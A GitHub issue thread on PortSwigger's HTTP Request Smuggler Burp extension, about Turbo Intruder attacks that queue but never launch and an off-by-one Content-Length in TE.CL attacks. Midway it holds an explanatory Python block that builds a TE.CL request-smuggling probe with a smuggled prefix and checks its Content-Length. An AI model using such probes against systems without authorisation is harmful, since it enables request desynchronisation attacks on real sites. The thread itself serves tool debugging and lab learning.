PortSwigger / http-request-smuggler

https://portswigger.net/blog/http-desync-attacks

Turbo Intruder Attacks Queue But Never Launch #49

Open maxicorbs opened 2 years ago

maxicorbs commented 2 years ago

Not sure if something has changed recently with the script that the plugin inserts into Turbo Intruder, but when I click 'Launch CL.TE/TE.CL attack' I can see the engine starting and the requests queueing, but no requests are actually made. Have tried this on multiple lab instances, on 2 different machines with 2 different versions of Burp, and consistently get this bug. Have watched plenty of YT videos in which they follow the exact same steps and the requests launch no problem. Screenshots of the script and queue attached.

Extension output says:

"The engine has already started - you no longer need to invoke engine.start() manually. If you prefer to invoke engine.start() manually, set autoStart=False in the constructor
Cancelled attack
Attack aborted with items waiting to be queued."

No requests in Logger++.

albinowax commented 2 years ago

Can you confirm which version of HTTP Request Smuggler you're using? Did you install it from the bapp store?

maxicorbs commented 2 years ago

Version v2.01

Got it from the bapp store yep.

Seem to have found a simple workaround by looking through archive.org for what changed in the Python script. Reverting 'engine=Engine.BURP' to 'engine=Engine.THREADED' seems to have fixed it for me, but unsure if there will be other repercussions to changing this value?

Also, just want to say a big thanks for your research, papers, tools and maintenance of all things HRS, James! You've got me set on finding my first triaged HRS bug.

maxicorbs commented 2 years ago

Not sure if this is a direct result of the amended workaround above, but currently all TE.CL attacks are being generated with a Content-Length that is 1 too many, i.e. Content-Length should be 12 but it is 13. I have got round this by changing

attack = attack.replace('Content-Length: '+content_length, 'Content-length: '+str(int(content_length)+len(chunk_size)-3))

to

attack = attack.replace('Content-Length: '+content_length, 'Content-length: '+str(int(content_length)+len(chunk_size)-4))

Could this be some nuance to the BURP/THREADED workaround?
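The Content-Length question in the comment above is worth pinning down independently of the extension's script, which is not shown on this page. In a TE.CL attack the Content-Length header has to cover exactly the first chunk-size line plus its CRLF, so that a back-end honouring Content-Length stops reading there and treats the chunk payload as the start of the next request, while the front-end, honouring Transfer-Encoding, forwards the whole chunked body. The code below is an added example, not the HTTP Request Smuggler Turbo Intruder script and not the commenter's code: it builds a TE.CL request the standard way, derives the correct Content-Length from the actual bytes, and reports by how many bytes a given header is off (so the "one too many" symptom shows up as +1). The host, path and smuggled prefix are constructed placeholders; nothing is sent over the network.

```python
# Added example for reasoning about TE.CL Content-Length values.
# Not the extension's script; every name here belongs to this example.

CRLF = "\r\n"


def build_te_cl(host: str, smuggled: str, path: str = "/") -> bytes:
    """Build a TE.CL probe: one chunk carrying `smuggled`, then the 0 chunk.

    Content-Length is set to the length of the chunk-size line including its
    CRLF. A back-end that trusts Content-Length stops after that line and
    parses the chunk payload as the beginning of the next request; a front-end
    that trusts Transfer-Encoding forwards the complete chunked body.
    """
    chunk_size = format(len(smuggled), "x")  # chunked coding uses hex sizes
    body = chunk_size + CRLF + smuggled + CRLF + "0" + CRLF + CRLF
    content_length = len(chunk_size) + len(CRLF)
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        f"Content-Length: {content_length}",
        "Transfer-Encoding: chunked",
    ]
    return (CRLF.join(headers) + CRLF + CRLF + body).encode("latin-1")


def content_length_offset(request: bytes) -> int:
    """Return declared Content-Length minus the correct TE.CL value.

    0 means the header is right for a TE.CL probe; +1 is the 'one too many'
    symptom. Computing from the real bytes means a stray non-printable
    character in the chunk-size line also shows up as an offset.
    """
    head, _, body = request.partition(b"\r\n\r\n")
    declared = None
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            declared = int(value.strip())
    if declared is None:
        raise ValueError("no Content-Length header")
    size_line, _, _ = body.partition(b"\r\n")
    int(size_line, 16)  # raises if the body does not start with a chunk size
    expected = len(size_line) + len(CRLF)
    return declared - expected


def with_content_length(request: bytes, value: int) -> bytes:
    """Rewrite the Content-Length header; used here to reproduce an off-by-one."""
    head, sep, body = request.partition(b"\r\n\r\n")
    lines = []
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            line = b"Content-Length: " + str(value).encode()
        lines.append(line)
    return b"\r\n".join(lines) + sep + body


# Constructed sample smuggled prefix (92 bytes, so the chunk size is "5c").
SAMPLE_SMUGGLED = (
    "GPOST / HTTP/1.1" + CRLF
    + "Content-Type: application/x-www-form-urlencoded" + CRLF
    + "Content-Length: 15" + CRLF
    + CRLF
    + "x=1"
)

if __name__ == "__main__":
    req = build_te_cl("example.invalid", SAMPLE_SMUGGLED)
    print(req.decode("latin-1"))
    print("offset as built:", content_length_offset(req))
    print("offset with CL+1:", content_length_offset(with_content_length(req, 5)))
```

Run it against the request Turbo Intruder actually shows in its attack window (paste the bytes in place of the constructed sample) to see whether the header is really one byte high, or whether, as suggested in the next reply, an unexpected byte in the request is what shifts the count.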

albinowax commented 2 years ago

Maybe you've got a non-printable character in the request that's breaking the engine and messing up the content-length.

maxicorbs commented 2 years ago

Hmm, can't see anything, but that is an easy fix. Are you able to confirm if others are also having the issue with Turbo Intruder queueing and needing to change to THREADED? If it is just me for whatever reason then I'll close this for you.

albinowax commented 2 years ago

Which lab were you having this issue on?

maxicorbs commented 2 years ago

I am still having this issue on multiple instances of the Burp plugin, not on any lab in particular. No matter which attack I'm trying, I can only launch Turbo Intruder by changing BURP to THREADED, but from looking at other people's video demonstrations this appears to fix the issue but causes some performance issues, as it runs slower.